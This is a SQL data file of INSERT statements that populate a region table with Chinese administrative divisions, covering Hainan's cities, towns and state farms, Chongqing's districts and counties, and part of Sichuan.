INSERT INTO `ey_region` VALUES ('31563', '海南省', '1', '0', 'H');
INSERT INTO `ey_region` VALUES ('31564', '海口市', '2', '31563', 'H');
INSERT INTO `ey_region` VALUES ('31565', '市辖区', '3', '31564', 'S');
INSERT INTO `ey_region` VALUES ('31566', '秀英区', '3', '31564', 'X');
INSERT INTO `ey_region` VALUES ('31575', '龙华区', '3', '31564', 'L');
INSERT INTO `ey_region` VALUES ('31587', '琼山区', '3', '31564', 'Q');
INSERT INTO `ey_region` VALUES ('31601', '美兰区', '3', '31564', 'M');
INSERT INTO `ey_region` VALUES ('31618', '三亚市', '2', '31563', 'S');
INSERT INTO `ey_region` VALUES ('47964', '海棠区', '3', '31618', 'H');
INSERT INTO `ey_region` VALUES ('31634', '五指山市', '2', '31563', 'W');
INSERT INTO `ey_region` VALUES ('31635', '冲山镇', '3', '31634', 'C');
INSERT INTO `ey_region` VALUES ('31636', '南圣镇', '3', '31634', 'N');
INSERT INTO `ey_region` VALUES ('31637', '毛阳镇', '3', '31634', 'M');
INSERT INTO `ey_region` VALUES ('31638', '番阳镇', '3', '31634', 'F');
INSERT INTO `ey_region` VALUES ('31639', '畅好乡', '3', '31634', 'C');
INSERT INTO `ey_region` VALUES ('31640', '毛道乡', '3', '31634', 'M');
INSERT INTO `ey_region` VALUES ('31641', '水满乡', '3', '31634', 'S');
INSERT INTO `ey_region` VALUES ('31642', '国营畅好农场', '3', '31634', 'G');
INSERT INTO `ey_region` VALUES ('31643', '琼海市', '2', '31563', 'Q');
INSERT INTO `ey_region` VALUES ('31644', '嘉积镇', '3', '31643', 'J');
INSERT INTO `ey_region` VALUES ('31645', '万泉镇', '3', '31643', 'W');
INSERT INTO `ey_region` VALUES ('31646', '石壁镇', '3', '31643', 'S');
INSERT INTO `ey_region` VALUES ('31647', '中原镇', '3', '31643', 'Z');
INSERT INTO `ey_region` VALUES ('31648', '博敖镇', '3', '31643', 'B');
INSERT INTO `ey_region` VALUES ('31649', '阳江镇', '3', '31643', 'Y');
INSERT INTO `ey_region` VALUES ('31650', '龙江镇', '3', '31643', 'L');
INSERT INTO `ey_region` VALUES ('31651', '潭门镇', '3', '31643', 'T');
INSERT INTO `ey_region` VALUES ('31652', '塔洋镇', '3', '31643', 'T');
INSERT INTO `ey_region` VALUES ('31653', '长坡镇', '3', '31643', 'C');
INSERT INTO `ey_region` VALUES ('31654', '大路镇', '3', '31643', 'D');
INSERT INTO `ey_region` VALUES ('31655', '会山镇', '3', '31643', 'H');
INSERT INTO `ey_region` VALUES ('31656', '国营东太农场', '3', '31643', 'G');
INSERT INTO `ey_region` VALUES ('31657', '国营东平农场', '3', '31643', 'G');
INSERT INTO `ey_region` VALUES ('31658', '国营东红农场', '3', '31643', 'G');
INSERT INTO `ey_region` VALUES ('31659', '国营东升农场', '3', '31643', 'G');
INSERT INTO `ey_region` VALUES ('31660', '国营南俸农场', '3', '31643', 'G');
INSERT INTO `ey_region` VALUES ('31661', '彬村山华侨农场', '3', '31643', 'B');
INSERT INTO `ey_region` VALUES ('31662', '儋州市', '2', '31563', 'D');
INSERT INTO `ey_region` VALUES ('31663', '那大镇', '3', '31662', 'N');
INSERT INTO `ey_region` VALUES ('31664', '和庆镇', '3', '31662', 'H');
INSERT INTO `ey_region` VALUES ('31665', '南丰镇', '3', '31662', 'N');
INSERT INTO `ey_region` VALUES ('31666', '大成镇', '3', '31662', 'D');
INSERT INTO `ey_region` VALUES ('31667', '雅星镇', '3', '31662', 'Y');
INSERT INTO `ey_region` VALUES ('31668', '兰洋镇', '3', '31662', 'L');
INSERT INTO `ey_region` VALUES ('31669', '光村镇', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31670', '木棠镇', '3', '31662', 'M');
INSERT INTO `ey_region` VALUES ('31671', '海头镇', '3', '31662', 'H');
INSERT INTO `ey_region` VALUES ('31672', '峨蔓镇', '3', '31662', 'E');
INSERT INTO `ey_region` VALUES ('31673', '三都镇', '3', '31662', 'S');
INSERT INTO `ey_region` VALUES ('31674', '王五镇', '3', '31662', 'W');
INSERT INTO `ey_region` VALUES ('31675', '白马井镇', '3', '31662', 'B');
INSERT INTO `ey_region` VALUES ('31676', '中和镇', '3', '31662', 'Z');
INSERT INTO `ey_region` VALUES ('31677', '排浦镇', '3', '31662', 'P');
INSERT INTO `ey_region` VALUES ('31678', '东成镇', '3', '31662', 'D');
INSERT INTO `ey_region` VALUES ('31679', '新州镇', '3', '31662', 'X');
INSERT INTO `ey_region` VALUES ('31680', '国营西培农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31681', '国营西华农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31682', '国营西庆农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31683', '国营西流农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31684', '国营西联农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31685', '国营蓝洋农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31686', '国营新盈农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31687', '国营八一农场东山分场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31688', '国营八一农场金川分场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31689', '国营八一农场长岭分场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31690', '国营八一农场英岛分场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31691', '国营八一农场春江分场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31692', '国营八一农场强打管区', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31693', '国营龙山农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31694', '国营红岭农场', '3', '31662', 'G');
INSERT INTO `ey_region` VALUES ('31695', '洋浦经济开发区', '3', '31662', 'Y');
INSERT INTO `ey_region` VALUES ('31696', '华南热作学院', '3', '31662', 'H');
INSERT INTO `ey_region` VALUES ('31697', '文昌市', '2', '31563', 'W');
INSERT INTO `ey_region` VALUES ('31698', '文城镇', '3', '31697', 'W');
INSERT INTO `ey_region` VALUES ('31699', '重兴镇', '3', '31697', 'Z');
INSERT INTO `ey_region` VALUES ('31700', '蓬莱镇', '3', '31697', 'P');
INSERT INTO `ey_region` VALUES ('31701', '会文镇', '3', '31697', 'H');
INSERT INTO `ey_region` VALUES ('31702', '东路镇', '3', '31697', 'D');
INSERT INTO `ey_region` VALUES ('31703', '潭牛镇', '3', '31697', 'T');
INSERT INTO `ey_region` VALUES ('31704', '东阁镇', '3', '31697', 'D');
INSERT INTO `ey_region` VALUES ('31705', '文教镇', '3', '31697', 'W');
INSERT INTO `ey_region` VALUES ('31706', '东郊镇', '3', '31697', 'D');
INSERT INTO `ey_region` VALUES ('31707', '龙楼镇', '3', '31697', 'L');
INSERT INTO `ey_region` VALUES ('31708', '昌洒镇', '3', '31697', 'C');
INSERT INTO `ey_region` VALUES ('31709', '翁田镇', '3', '31697', 'W');
INSERT INTO `ey_region` VALUES ('31710', '抱罗镇', '3', '31697', 'B');
INSERT INTO `ey_region` VALUES ('31711', '冯坡镇', '3', '31697', 'F');
INSERT INTO `ey_region` VALUES ('31712', '锦山镇', '3', '31697', 'J');
INSERT INTO `ey_region` VALUES ('31713', '铺前镇', '3', '31697', 'P');
INSERT INTO `ey_region` VALUES ('31714', '国营东路农场', '3', '31697', 'G');
INSERT INTO `ey_region` VALUES ('31715', '国营南阳农场', '3', '31697', 'G');
INSERT INTO `ey_region` VALUES ('31716', '国营罗豆农场', '3', '31697', 'G');
INSERT INTO `ey_region` VALUES ('31717', '国营文昌橡胶研究所', '3', '31697', 'G');
INSERT INTO `ey_region` VALUES ('31718', '万宁市', '2', '31563', 'W');
INSERT INTO `ey_region` VALUES ('31719', '万城镇', '3', '31718', 'W');
INSERT INTO `ey_region` VALUES ('31720', '龙滚镇', '3', '31718', 'L');
INSERT INTO `ey_region` VALUES ('31721', '和乐镇', '3', '31718', 'H');
INSERT INTO `ey_region` VALUES ('31722', '后安镇', '3', '31718', 'H');
INSERT INTO `ey_region` VALUES ('31723', '大茂镇', '3', '31718', 'D');
INSERT INTO `ey_region` VALUES ('31724', '东澳镇', '3', '31718', 'D');
INSERT INTO `ey_region` VALUES ('31725', '礼纪镇', '3', '31718', 'L');
INSERT INTO `ey_region` VALUES ('31726', '长丰镇', '3', '31718', 'C');
INSERT INTO `ey_region` VALUES ('31727', '山根镇', '3', '31718', 'S');
INSERT INTO `ey_region` VALUES ('31728', '北大镇', '3', '31718', 'B');
INSERT INTO `ey_region` VALUES ('31729', '南桥镇', '3', '31718', 'N');
INSERT INTO `ey_region` VALUES ('31730', '三更罗镇', '3', '31718', 'S');
INSERT INTO `ey_region` VALUES ('31731', '国营东兴农场', '3', '31718', 'G');
INSERT INTO `ey_region` VALUES ('31732', '国营东和农场', '3', '31718', 'G');
INSERT INTO `ey_region` VALUES ('31733', '国营东岭农场', '3', '31718', 'G');
INSERT INTO `ey_region` VALUES ('31734', '国营南林农场', '3', '31718', 'G');
INSERT INTO `ey_region` VALUES ('31735', '国营新中农场', '3', '31718', 'G');
INSERT INTO `ey_region` VALUES ('31736', '兴隆华侨农场', '3', '31718', 'X');
INSERT INTO `ey_region` VALUES ('31737', '地方国营六连林场', '3', '31718', 'D');
INSERT INTO `ey_region` VALUES ('31738', '东方市', '2', '31563', 'D');
INSERT INTO `ey_region` VALUES ('31739', '八所镇', '3', '31738', 'B');
INSERT INTO `ey_region` VALUES ('31740', '东河镇', '3', '31738', 'D');
INSERT INTO `ey_region` VALUES ('31741', '大田镇', '3', '31738', 'D');
INSERT INTO `ey_region` VALUES ('31742', '感城镇', '3', '31738', 'G');
INSERT INTO `ey_region` VALUES ('31743', '板桥镇', '3', '31738', 'B');
INSERT INTO `ey_region` VALUES ('31744', '三家镇', '3', '31738', 'S');
INSERT INTO `ey_region` VALUES ('31745', '四更镇', '3', '31738', 'S');
INSERT INTO `ey_region` VALUES ('31746', '新龙镇', '3', '31738', 'X');
INSERT INTO `ey_region` VALUES ('31747', '天安乡', '3', '31738', 'T');
INSERT INTO `ey_region` VALUES ('31748', '江边乡', '3', '31738', 'J');
INSERT INTO `ey_region` VALUES ('31749', '国营广坝农场', '3', '31738', 'G');
INSERT INTO `ey_region` VALUES ('31750', '国营公爱农场', '3', '31738', 'G');
INSERT INTO `ey_region` VALUES ('31751', '国营红泉农场', '3', '31738', 'G');
INSERT INTO `ey_region` VALUES ('31752', '省国营东方华侨农场', '3', '31738', 'S');
INSERT INTO `ey_region` VALUES ('31753', '定安县', '2', '31563', 'D');
INSERT INTO `ey_region` VALUES ('31754', '定城镇', '3', '31753', 'D');
INSERT INTO `ey_region` VALUES ('31755', '新竹镇', '3', '31753', 'X');
INSERT INTO `ey_region` VALUES ('31756', '龙湖镇', '3', '31753', 'L');
INSERT INTO `ey_region` VALUES ('31757', '黄竹镇', '3', '31753', 'H');
INSERT INTO `ey_region` VALUES ('31758', '雷鸣镇', '3', '31753', 'L');
INSERT INTO `ey_region` VALUES ('31759', '龙门镇', '3', '31753', 'L');
INSERT INTO `ey_region` VALUES ('31760', '龙河镇', '3', '31753', 'L');
INSERT INTO `ey_region` VALUES ('31761', '岭口镇', '3', '31753', 'L');
INSERT INTO `ey_region` VALUES ('31762', '翰林镇', '3', '31753', 'H');
INSERT INTO `ey_region` VALUES ('31763', '富文镇', '3', '31753', 'F');
INSERT INTO `ey_region` VALUES ('31764', '国营中瑞农场', '3', '31753', 'G');
INSERT INTO `ey_region` VALUES ('31765', '国营南海农场', '3', '31753', 'G');
INSERT INTO `ey_region` VALUES ('31766', '国营金鸡岭农场', '3', '31753', 'G');
INSERT INTO `ey_region` VALUES ('31767', '定安热作研究所', '3', '31753', 'D');
INSERT INTO `ey_region` VALUES ('31768', '屯昌县', '2', '31563', 'T');
INSERT INTO `ey_region` VALUES ('31769', '屯城镇', '3', '31768', 'T');
INSERT INTO `ey_region` VALUES ('31770', '新兴镇', '3', '31768', 'X');
INSERT INTO `ey_region` VALUES ('31771', '枫木镇', '3', '31768', 'F');
INSERT INTO `ey_region` VALUES ('31772', '乌坡镇', '3', '31768', 'W');
INSERT INTO `ey_region` VALUES ('31773', '南吕镇', '3', '31768', 'N');
INSERT INTO `ey_region` VALUES ('31774', '南坤镇', '3', '31768', 'N');
INSERT INTO `ey_region` VALUES ('31775', '坡心镇', '3', '31768', 'P');
INSERT INTO `ey_region` VALUES ('31776', '西昌镇', '3', '31768', 'X');
INSERT INTO `ey_region` VALUES ('31777', '国营中建农场', '3', '31768', 'G');
INSERT INTO `ey_region` VALUES ('31778', '国营中坤农场', '3', '31768', 'G');
INSERT INTO `ey_region` VALUES ('31779', '国营黄岭农场', '3', '31768', 'G');
INSERT INTO `ey_region` VALUES ('31780', '国营南吕农场', '3', '31768', 'G');
INSERT INTO `ey_region` VALUES ('31781', '国营广青农场', '3', '31768', 'G');
INSERT INTO `ey_region` VALUES ('31782', '国营晨星农场', '3', '31768', 'G');
INSERT INTO `ey_region` VALUES ('31783', '澄迈县', '2', '31563', 'C');
INSERT INTO `ey_region` VALUES ('31784', '金江镇', '3', '31783', 'J');
INSERT INTO `ey_region` VALUES ('31785', '老城镇', '3', '31783', 'L');
INSERT INTO `ey_region` VALUES ('31786', '瑞溪镇', '3', '31783', 'R');
INSERT INTO `ey_region` VALUES ('31787', '永发镇', '3', '31783', 'Y');
INSERT INTO `ey_region` VALUES ('31788', '加乐镇', '3', '31783', 'J');
INSERT INTO `ey_region` VALUES ('31789', '文儒镇', '3', '31783', 'W');
INSERT INTO `ey_region` VALUES ('31790', '中兴镇', '3', '31783', 'Z');
INSERT INTO `ey_region` VALUES ('31791', '仁兴镇', '3', '31783', 'R');
INSERT INTO `ey_region` VALUES ('31792', '福山镇', '3', '31783', 'F');
INSERT INTO `ey_region` VALUES ('31793', '桥头镇', '3', '31783', 'Q');
INSERT INTO `ey_region` VALUES ('31794', '国营红光农场', '3', '31783', 'G');
INSERT INTO `ey_region` VALUES ('31795', '国营红岗农场', '3', '31783', 'G');
INSERT INTO `ey_region` VALUES ('31796', '国营西达农场', '3', '31783', 'G');
INSERT INTO `ey_region` VALUES ('31797', '国营昆仑农场', '3', '31783', 'G');
INSERT INTO `ey_region` VALUES ('31798', '国营和岭农场', '3', '31783', 'G');
INSERT INTO `ey_region` VALUES ('31799', '国营金安农场', '3', '31783', 'G');
INSERT INTO `ey_region` VALUES ('31800', '澄迈县华侨农场', '3', '31783', 'C');
INSERT INTO `ey_region` VALUES ('31801', '临高县', '2', '31563', 'L');
INSERT INTO `ey_region` VALUES ('31802', '临城镇', '3', '31801', 'L');
INSERT INTO `ey_region` VALUES ('31803', '波莲镇', '3', '31801', 'B');
INSERT INTO `ey_region` VALUES ('31804', '东英镇', '3', '31801', 'D');
INSERT INTO `ey_region` VALUES ('31805', '博厚镇', '3', '31801', 'B');
INSERT INTO `ey_region` VALUES ('31806', '皇桐镇', '3', '31801', 'H');
INSERT INTO `ey_region` VALUES ('31807', '多文镇', '3', '31801', 'D');
INSERT INTO `ey_region` VALUES ('31808', '和舍镇', '3', '31801', 'H');
INSERT INTO `ey_region` VALUES ('31809', '南宝镇', '3', '31801', 'N');
INSERT INTO `ey_region` VALUES ('31810', '新盈镇', '3', '31801', 'X');
INSERT INTO `ey_region` VALUES ('31811', '调楼镇', '3', '31801', 'D');
INSERT INTO `ey_region` VALUES ('31812', '国营红华农场', '3', '31801', 'G');
INSERT INTO `ey_region` VALUES ('31813', '国营加来农场', '3', '31801', 'G');
INSERT INTO `ey_region` VALUES ('31814', '白沙县', '2', '31563', 'B');
INSERT INTO `ey_region` VALUES ('31815', '牙叉镇', '3', '31814', 'Y');
INSERT INTO `ey_region` VALUES ('31816', '七坊镇', '3', '31814', 'Q');
INSERT INTO `ey_region` VALUES ('31817', '邦溪镇', '3', '31814', 'B');
INSERT INTO `ey_region` VALUES ('31818', '打安镇', '3', '31814', 'D');
INSERT INTO `ey_region` VALUES ('31819', '细水乡', '3', '31814', 'X');
INSERT INTO `ey_region` VALUES ('31820', '元门乡', '3', '31814', 'Y');
INSERT INTO `ey_region` VALUES ('31821', '南开乡', '3', '31814', 'N');
INSERT INTO `ey_region` VALUES ('31822', '阜龙乡', '3', '31814', 'F');
INSERT INTO `ey_region` VALUES ('31823', '青松乡', '3', '31814', 'Q');
INSERT INTO `ey_region` VALUES ('31824', '金波乡', '3', '31814', 'J');
INSERT INTO `ey_region` VALUES ('31825', '荣邦乡', '3', '31814', 'R');
INSERT INTO `ey_region` VALUES ('31826', '国营金波农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31827', '国营白沙农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31828', '国营牙叉农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31829', '国营卫星农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31830', '国营龙江农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31831', '国营珠碧江农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31832', '国营芙蓉田农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31833', '国营大岭农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31834', '国营邦溪农场', '3', '31814', 'G');
INSERT INTO `ey_region` VALUES ('31835', '昌江县', '2', '31563', 'C');
INSERT INTO `ey_region` VALUES ('31836', '石碌镇', '3', '31835', 'S');
INSERT INTO `ey_region` VALUES ('31837', '叉河镇', '3', '31835', 'C');
INSERT INTO `ey_region` VALUES ('31838', '十月田镇', '3', '31835', 'S');
INSERT INTO `ey_region` VALUES ('31839', '乌烈镇', '3', '31835', 'W');
INSERT INTO `ey_region` VALUES ('31840', '昌化镇', '3', '31835', 'C');
INSERT INTO `ey_region` VALUES ('31841', '海尾镇', '3', '31835', 'H');
INSERT INTO `ey_region` VALUES ('31842', '七叉镇', '3', '31835', 'Q');
INSERT INTO `ey_region` VALUES ('31843', '王下乡', '3', '31835', 'W');
INSERT INTO `ey_region` VALUES ('31844', '国营红田农场', '3', '31835', 'G');
INSERT INTO `ey_region` VALUES ('31845', '国营红林农场', '3', '31835', 'G');
INSERT INTO `ey_region` VALUES ('31846', '国营坝王岭林场', '3', '31835', 'G');
INSERT INTO `ey_region` VALUES ('31847', '海南钢铁公司', '3', '31835', 'H');
INSERT INTO `ey_region` VALUES ('31848', '乐东县', '2', '31563', 'L');
INSERT INTO `ey_region` VALUES ('31849', '抱由镇', '3', '31848', 'B');
INSERT INTO `ey_region` VALUES ('31850', '万冲镇', '3', '31848', 'W');
INSERT INTO `ey_region` VALUES ('31851', '大安镇', '3', '31848', 'D');
INSERT INTO `ey_region` VALUES ('31852', '志仲镇', '3', '31848', 'Z');
INSERT INTO `ey_region` VALUES ('31853', '千家镇', '3', '31848', 'Q');
INSERT INTO `ey_region` VALUES ('31854', '九所镇', '3', '31848', 'J');
INSERT INTO `ey_region` VALUES ('31855', '利国镇', '3', '31848', 'L');
INSERT INTO `ey_region` VALUES ('31856', '黄流镇', '3', '31848', 'H');
INSERT INTO `ey_region` VALUES ('31857', '佛罗镇', '3', '31848', 'F');
INSERT INTO `ey_region` VALUES ('31858', '尖峰镇', '3', '31848', 'J');
INSERT INTO `ey_region` VALUES ('31859', '莺歌海镇', '3', '31848', 'Y');
INSERT INTO `ey_region` VALUES ('31860', '国营乐中农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31861', '国营山荣农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31862', '国营乐光农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31863', '国营报伦农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31864', '国营福报农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31865', '国营保国农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31866', '国营保显农场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31867', '国营尖峰岭林业公司', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31868', '国营莺歌海盐场', '3', '31848', 'G');
INSERT INTO `ey_region` VALUES ('31869', '陵水县', '2', '31563', 'L');
INSERT INTO `ey_region` VALUES ('31870', '椰林镇', '3', '31869', 'Y');
INSERT INTO `ey_region` VALUES ('31871', '光坡镇', '3', '31869', 'G');
INSERT INTO `ey_region` VALUES ('31872', '三才镇', '3', '31869', 'S');
INSERT INTO `ey_region` VALUES ('31873', '英州镇', '3', '31869', 'Y');
INSERT INTO `ey_region` VALUES ('31874', '隆广镇', '3', '31869', 'L');
INSERT INTO `ey_region` VALUES ('31875', '文罗镇', '3', '31869', 'W');
INSERT INTO `ey_region` VALUES ('31876', '本号镇', '3', '31869', 'B');
INSERT INTO `ey_region` VALUES ('31877', '新村镇', '3', '31869', 'X');
INSERT INTO `ey_region` VALUES ('31878', '黎安镇', '3', '31869', 'L');
INSERT INTO `ey_region` VALUES ('31879', '提蒙乡', '3', '31869', 'T');
INSERT INTO `ey_region` VALUES ('31880', '群英乡', '3', '31869', 'Q');
INSERT INTO `ey_region` VALUES ('31881', '国营岭门农场', '3', '31869', 'G');
INSERT INTO `ey_region` VALUES ('31882', '国营南平农场', '3', '31869', 'G');
INSERT INTO `ey_region` VALUES ('31883', '国营吊罗山林业公司', '3', '31869', 'G');
INSERT INTO `ey_region` VALUES ('31884', '保亭县', '2', '31563', 'B');
INSERT INTO `ey_region` VALUES ('31885', '保城镇', '3', '31884', 'B');
INSERT INTO `ey_region` VALUES ('31886', '什玲镇', '3', '31884', 'S');
INSERT INTO `ey_region` VALUES ('31887', '加茂镇', '3', '31884', 'J');
INSERT INTO `ey_region` VALUES ('31888', '响水镇', '3', '31884', 'X');
INSERT INTO `ey_region` VALUES ('31889', '新政镇', '3', '31884', 'X');
INSERT INTO `ey_region` VALUES ('31890', '三道镇', '3', '31884', 'S');
INSERT INTO `ey_region` VALUES ('31891', '六弓乡', '3', '31884', 'L');
INSERT INTO `ey_region` VALUES ('31892', '南林乡', '3', '31884', 'N');
INSERT INTO `ey_region` VALUES ('31893', '毛感乡', '3', '31884', 'M');
INSERT INTO `ey_region` VALUES ('31894', '国营五指山茶场', '3', '31884', 'G');
INSERT INTO `ey_region` VALUES ('31895', '国营新星农场', '3', '31884', 'G');
INSERT INTO `ey_region` VALUES ('31896', '国营保亭热作所', '3', '31884', 'G');
INSERT INTO `ey_region` VALUES ('31897', '国营金江农场', '3', '31884', 'G');
INSERT INTO `ey_region` VALUES ('31898', '国营南茂农场', '3', '31884', 'G');
INSERT INTO `ey_region` VALUES ('31899', '国营三道农场', '3', '31884', 'G');
INSERT INTO `ey_region` VALUES ('31900', '琼中县', '2', '31563', 'Q');
INSERT INTO `ey_region` VALUES ('31901', '营根镇', '3', '31900', 'Y');
INSERT INTO `ey_region` VALUES ('31902', '湾岭镇', '3', '31900', 'W');
INSERT INTO `ey_region` VALUES ('31903', '黎母山镇', '3', '31900', 'L');
INSERT INTO `ey_region` VALUES ('31904', '和平镇', '3', '31900', 'H');
INSERT INTO `ey_region` VALUES ('31905', '长征镇', '3', '31900', 'C');
INSERT INTO `ey_region` VALUES ('31906', '红毛镇', '3', '31900', 'H');
INSERT INTO `ey_region` VALUES ('31907', '中平镇', '3', '31900', 'Z');
INSERT INTO `ey_region` VALUES ('31908', '吊罗山乡', '3', '31900', 'D');
INSERT INTO `ey_region` VALUES ('31909', '上安乡', '3', '31900', 'S');
INSERT INTO `ey_region` VALUES ('31910', '什运乡', '3', '31900', 'S');
INSERT INTO `ey_region` VALUES ('31911', '国营新进农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31912', '国营大丰农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31913', '国营阳江农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31914', '国营乌石农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31915', '国营南方农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31916', '国营岭头农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31917', '国营加钗农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31918', '国营长征农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31919', '国营乘坡农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31920', '国营太平农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31921', '国营新伟农场', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31922', '国营黎母山林业公司', '3', '31900', 'G');
INSERT INTO `ey_region` VALUES ('31923', '西沙群岛', '3', '31924', 'X');
INSERT INTO `ey_region` VALUES ('31924', '三沙市', '2', '31563', 'S');
INSERT INTO `ey_region` VALUES ('31925', '南沙群岛', '3', '31924', 'N');
INSERT INTO `ey_region` VALUES ('47499', '香港岛', '2', '47494', 'X');
INSERT INTO `ey_region` VALUES ('31927', '中沙群岛的岛礁及其海域', '3', '31924', 'Z');
INSERT INTO `ey_region` VALUES ('47498', '九龙', '2', '47494', 'J');
INSERT INTO `ey_region` VALUES ('31929', '重庆市', '1', '0', 'Z');
INSERT INTO `ey_region` VALUES ('31930', '重庆市', '2', '31929', 'C');
INSERT INTO `ey_region` VALUES ('31931', '万州区', '3', '31930', 'W');
INSERT INTO `ey_region` VALUES ('31984', '涪陵区', '3', '31930', 'F');
INSERT INTO `ey_region` VALUES ('32031', '渝中区', '3', '31930', 'Y');
INSERT INTO `ey_region` VALUES ('32044', '大渡口区', '3', '31930', 'D');
INSERT INTO `ey_region` VALUES ('32053', '江北区', '3', '31930', 'J');
INSERT INTO `ey_region` VALUES ('32066', '沙坪坝区', '3', '31930', 'S');
INSERT INTO `ey_region` VALUES ('32093', '九龙坡区', '3', '31930', 'J');
INSERT INTO `ey_region` VALUES ('32112', '南岸区', '3', '31930', 'N');
INSERT INTO `ey_region` VALUES ('32127', '北碚区', '3', '31930', 'B');
INSERT INTO `ey_region` VALUES ('32145', '万盛区', '3', '31930', 'W');
INSERT INTO `ey_region` VALUES ('32156', '双桥区', '3', '31930', 'S');
INSERT INTO `ey_region` VALUES ('32160', '渝北区', '3', '31930', 'Y');
INSERT INTO `ey_region` VALUES ('32191', '巴南区', '3', '31930', 'B');
INSERT INTO `ey_region` VALUES ('32213', '黔江区', '3', '31930', 'Q');
INSERT INTO `ey_region` VALUES ('32244', '长寿区', '3', '31930', 'C');
INSERT INTO `ey_region` VALUES ('32263', '江津区', '3', '31930', 'J');
INSERT INTO `ey_region` VALUES ('32291', '合川区', '3', '31930', 'H');
INSERT INTO `ey_region` VALUES ('32322', '永川区', '3', '31930', 'Y');
INSERT INTO `ey_region` VALUES ('32345', '南川区', '3', '31930', 'N');
INSERT INTO `ey_region` VALUES ('32380', '县', '2', '31929', 'X');
INSERT INTO `ey_region` VALUES ('32381', '綦江县', '3', '32380', 'Q');
INSERT INTO `ey_region` VALUES ('32401', '潼南县', '3', '32380', 'T');
INSERT INTO `ey_region` VALUES ('32424', '铜梁县', '3', '32380', 'T');
INSERT INTO `ey_region` VALUES ('32453', '大足县', '3', '32380', 'D');
INSERT INTO `ey_region` VALUES ('32478', '荣昌县', '3', '32380', 'R');
INSERT INTO `ey_region` VALUES ('32499', '璧山县', '3', '32380', 'B');
INSERT INTO `ey_region` VALUES ('32513', '梁平县', '3', '32380', 'L');
INSERT INTO `ey_region` VALUES ('32549', '城口县', '3', '32380', 'C');
INSERT INTO `ey_region` VALUES ('32574', '丰都县', '3', '32380', 'F');
INSERT INTO `ey_region` VALUES ('32606', '垫江县', '3', '32380', 'D');
INSERT INTO `ey_region` VALUES ('32632', '武隆县', '3', '32380', 'W');
INSERT INTO `ey_region` VALUES ('32659', '忠县', '3', '32380', 'Z');
INSERT INTO `ey_region` VALUES ('32688', '开县', '3', '32380', 'K');
INSERT INTO `ey_region` VALUES ('32727', '云阳县', '3', '32380', 'Y');
INSERT INTO `ey_region` VALUES ('32771', '奉节县', '3', '32380', 'F');
INSERT INTO `ey_region` VALUES ('32802', '巫山县', '3', '32380', 'W');
INSERT INTO `ey_region` VALUES ('32829', '巫溪县', '3', '32380', 'W');
INSERT INTO `ey_region` VALUES ('32861', '石柱县', '3', '32380', 'S');
INSERT INTO `ey_region` VALUES ('32894', '秀山县', '3', '32380', 'X');
INSERT INTO `ey_region` VALUES ('32927', '酉阳县', '3', '32380', 'Y');
INSERT INTO `ey_region` VALUES ('32967', '彭水县', '3', '32380', 'P');
INSERT INTO `ey_region` VALUES ('33007', '四川省', '1', '0', 'S');
INSERT INTO `ey_region` VALUES ('33008', '成都市', '2', '33007', 'C');
INSERT INTO `ey_region` VALUES ('33009', '市辖区', '3', '33008', 'S');
INSERT INTO `ey_region` VALUES ('33010', '锦江区', '3', '33008', 'J');
INSERT INTO `ey_region` VALUES ('33027', '青羊区', '3', '33008', 'Q');
INSERT INTO `ey_region` VALUES ('33042', '金牛区', '3', '33008', 'J');
INSERT INTO `ey_region` VALUES ('33058', '武侯区', '3', '33008', 'W');
INSERT INTO `ey_region` VALUES ('33076', '成华区', '3', '33008', 'C');
INSERT INTO `ey_region` VALUES ('33091', '龙泉驿区', '3', '33008', 'L');
INSERT INTO `ey_region` VALUES ('33104', '青白江区', '3', '33008', 'Q');
INSERT INTO `ey_region` VALUES ('33116', '新都区', '3', '33008', 'X');
INSERT INTO `ey_region` VALUES ('33130', '温江区', '3', '33008', 'W');
INSERT INTO `ey_region` VALUES ('33141', '金堂县', '3', '33008', 'J');
INSERT INTO `ey_region` VALUES ('33163', '双流县', '3', '33008', 'S');
